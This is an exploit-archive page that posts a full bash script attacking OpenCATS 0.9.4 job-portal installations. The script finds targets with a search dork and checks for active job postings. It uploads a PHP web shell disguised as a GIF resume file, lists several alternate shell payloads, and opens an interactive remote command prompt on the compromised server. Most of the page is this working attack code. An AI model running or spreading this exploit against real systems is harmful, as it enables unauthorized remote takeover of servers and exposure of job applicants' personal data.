exploit the possibilities

OpenCATS 0.9.4 Remote Code Execution

OpenCATS 0.9.4 Remote Code Execution
Posted Dec 10, 2021
Authored by Nicholas Ferreira

OpenCATS version 0.9.4 suffers from a remote code execution vulnerability.

tags | exploit, remote, code execution
SHA-256 | e7ff0cc62cfad44e30b93e807a8b4734da83818fcd754cefa8c8cb6c43f7025d

OpenCATS 0.9.4 Remote Code Execution

Change Mirror Download
# Exploit Title: OpenCATS 0.9.4 - Remote Code Execution (RCE)
# Google Dork: intext:"Current Available Openings, Recently Posted Jobs"
# Date: 21/09/2021
# Exploit Author: Nicholas Ferreira - https://github.com/Nickguitar
# Vendor Homepage: https://www.opencats.org/
# Software Link: https://github.com/opencats/OpenCATS
# Version: <=0.9.4 Countach
# Tested on: Debian, CentOS, Windows Server

#!/bin/bash

if [ $# -eq 0 ]
then
echo "Usage: $0 <target URL>"
exit
fi



# if a payload doesn't work, try another

payload='GIF87a<?php echo system($_REQUEST[0]); ?>'
#payload='GIF87a<?php echo exec($_REQUEST[0]); ?>'
#payload='GIF87a<?php echo shell_exec($_REQUEST[0]); ?>'
#payload='GIF87a<?php echo passthru($_REQUEST[0]); ?>'
#payload='GIF87a<?php echo `$_REQUEST[0]`; ?>'
#payload='GIF87a<?php echo system($_REQUEST[0]); ?>'
#payload='GIF87a<?php echo $p=popen($_REQUEST[0],"r");while(!feof($p))echo fread($p,1024); ?>'

target=$1

green="\033[0;32m"
red="\033[0;31m"
reset="\033[0m"

#====================== Functions

rev() {
while true
do echo -n -e "\n$ "
read cmd
curl -skL -X POST -d "0=$cmd" $1 | sed "s/^GIF87a//" | sed "$ d"
done
}

upload() {
curl -skL $1/$2 \
-H "Connection: close" \
-F resumeFile=@"$3;type=application/x-php" \
-F ID="$firstJb" \
-F candidateID="-1" \
-F applyToJobSubAction="resumeLoad" \
--compressed \
--insecure
}

getVersion() {
ver=`curl -skL $1 | grep -E "span.*([0-9]\.)+" | sed "s/<[^>]*>//g" | grep -Eo -m 1 "([0-9]\.)+[0-9]*"`

if [ -z "${ver}" ]
then
ver=`curl -skL "$1/installtest.php" | grep -Eio "CATS version is ([0-9]\.)+[0-9]*" | grep -Eo -m 1 "([0-9]\.)+[0-9]*"`
if [ -z "${ver}" ]
then
echo -e "${red}[-] Couldn't identity CATS version, but that's ok...${reset}"
return 0
fi
fi
echo -e "${green}[*] Version detected: $ver${reset}"
}

writePayload(){

tmpfile=$(tr -dc A-Za-z0-9 </dev/urandom | head -c 5)".php"
file=`basename $tmpfile`
echo "$1" > $tmpfile
}

banner(){
echo "IF8uXyAgICAgXywtJyIiYC0uXyAKKCwtLmAuXywnKCAgICAgICB8XGAtL3wgICAgICAgIFJldkNBVCAtIE9wZW5DQVQgUkNFCiAgICBgLS4tJyBcICktYCggLCBvIG8pICAgICAgICAgTmljaG9sYXMgIEZlcnJlaXJhCiAgICAgICAgICBgLSAgICBcYF9gIictICAgaHR0cHM6Ly9naXRodWIuY29tL05pY2tndWl0YXI=" | base64 -d
echo -e "\n"
}

#======================

banner

echo "[*] Attacking target $target"

echo "[*] Checking CATS version..."
getVersion $target
#exit

echo "[*] Creating temp file with payload..."
writePayload "$payload"

#exit

echo "[*] Checking active jobs..."

jbRequest=`curl -skL $target'/careers/index.php?m=careers&p=showAll'`
numJb=`echo "$jbRequest" | grep "Posted Jobs" |sed -E 's/.*: ([0-9]+).*/\1/'`
firstJb=`echo "$jbRequest" | grep -m 1 '<td><a href="index.php?m=careers' | sed -E 's/.*=([0-9]+)\".*/\1/'`

if [[ ! $numJb -gt 0 ]]
then
echo -e "${red}[-] No active jobs found.${reset}"
echo "[*] Trying another path..."
jbRequest=`curl -skL $target'/index.php?m=careers&p=showAll'`
numJb=`echo "$jbRequest" | grep "Posted Jobs" | sed -e 's/<[^>]*>//g' | sed -E 's/.*Posted Jobs.*: ([0-9]+).*/\1/'`

if [[ ! $numJb -gt 0 ]]
then
echo -e "${red}[-] Couldn't find any active job.${reset}"
exit
fi
fi

firstJb=`echo "$jbRequest" | grep -m 1 '<td><a href="index.php?m=careers' | sed -E 's/.*=([0-9]+)\".*/\1/'`

echo -e "${green}[+] Jobs found! Using job id $firstJb${reset}"
echo "[*] Sending payload..."

req=`upload "$target" "/careers/index.php?m=careers&p=onApplyToJobOrder" "$tmpfile"`

if ! `echo "$req" | egrep -q "still be uploaded|will be uploaded|$file"`
then
echo -e "${red}[-] Couldn't detect if payload was uploaded${reset}"
echo "[*] Checking by another method..."

sed -i "s/GIF87a//" $tmpfile

req=`upload "$target" "index.php?m=careers&p=onApplyToJobOrder" "$tmpfile"`

if ! `echo "$req" | egrep -q "still be uploaded|will be uploaded|$file"`
then
echo -e "${red}[-] Couldn't upload payload...${reset}"
exit
fi
fi

echo -e "${green}[+] Payload $file uploaded!"
echo "[*] Deleting created temp file..."
rm $tmpfile
echo "[*] Checking shell..."
check=$(curl -skL -d '0=echo 0x7359' "$target/upload/careerportaladd/$file")
if `echo $check | grep -q "0x7359"`
then
echo -e "${green}[+] Got shell! :D${reset}"
curl -skL -X POST -d "0=id;uname -a" "$target/upload/careerportaladd/$file" | sed "s/^GIF87a//" | sed "$ d"
rev $target/upload/careerportaladd/$file
else
echo -e "${red}[-] Couldn't get reverse shell.\n Maybe you should try it manually or use another payload.${reset}"
fi

Login or Register to add favorites

File Archive:

May 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    0 Files
  • 2
    May 2nd
    15 Files
  • 3
    May 3rd
    19 Files
  • 4
    May 4th
    24 Files
  • 5
    May 5th
    15 Files
  • 6
    May 6th
    14 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    13 Files
  • 10
    May 10th
    7 Files
  • 11
    May 11th
    99 Files
  • 12
    May 12th
    45 Files
  • 13
    May 13th
    7 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    26 Files
  • 18
    May 18th
    4 Files
  • 19
    May 19th
    17 Files
  • 20
    May 20th
    2 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    6 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close